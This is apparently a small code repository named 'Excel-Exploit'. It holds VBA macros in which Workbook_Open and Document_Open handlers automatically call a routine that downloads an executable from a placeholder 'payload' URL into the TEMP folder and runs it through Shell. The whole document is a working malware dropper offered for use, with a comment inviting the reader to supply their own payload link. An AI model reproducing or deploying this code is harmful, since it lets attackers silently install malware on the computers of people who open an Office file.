├── README.md ├── ThisDocument.txt ├── ThisWorkbook.txt └── MacroExploit.txt /README.md: -------------------------------------------------------------------------------- 1 | # Excel-Exploit 2 | MacroExploit use in excel sheet 3 | -------------------------------------------------------------------------------- /ThisDocument.txt: -------------------------------------------------------------------------------- 1 | Private Sub Document_Open() 2 | Call DownloadExeFileAndExecuteSilent 3 | End Sub 4 | -------------------------------------------------------------------------------- /ThisWorkbook.txt: -------------------------------------------------------------------------------- 1 | Private Sub Workbook_Open() 2 | Call DownloadExeFileAndExecuteSilent 3 | End Sub 4 | -------------------------------------------------------------------------------- /MacroExploit.txt: -------------------------------------------------------------------------------- 1 | Sub DownloadExeFileAndExecuteSilent() 2 | Dim strUserFolder As String 3 | Dim strFileUrl As String 4 | Dim strFilePath As String 5 | Dim oHttp As Object 6 | Dim oStream As Object 7 | Dim command As String 8 | strFileUrl = "https://example.com/file.exe" ' Your payload direct download link 9 | strUserFolder = Environ("TEMP") ' Locates Temp Directory 10 | strFilePath = strUserFolder & "/pp.exe" ' Creates the payload as pp.exe in temp directory 11 | Set oHttp = CreateObject("MSXML2.XMLHTTP.6.0") 12 | oHttp.Open "GET", strFileUrl, False 13 | oHttp.send 14 | Set oStream = CreateObject("ADODB.Stream") 15 | oStream.Type = 1 16 | oStream.Open 17 | oStream.Write oHttp.responseBody 18 | oStream.SaveToFile strFilePath, 2 19 | oStream.Close 20 | Set oStream = Nothing 21 | Set oHttp = Nothing 22 | command = strFilePath 23 | Call Shell(command, vbNormalFocus) ' Executes the payload using shell to bypass authentication 24 | End Sub 25 | 26 | 27 | --------------------------------------------------------------------------------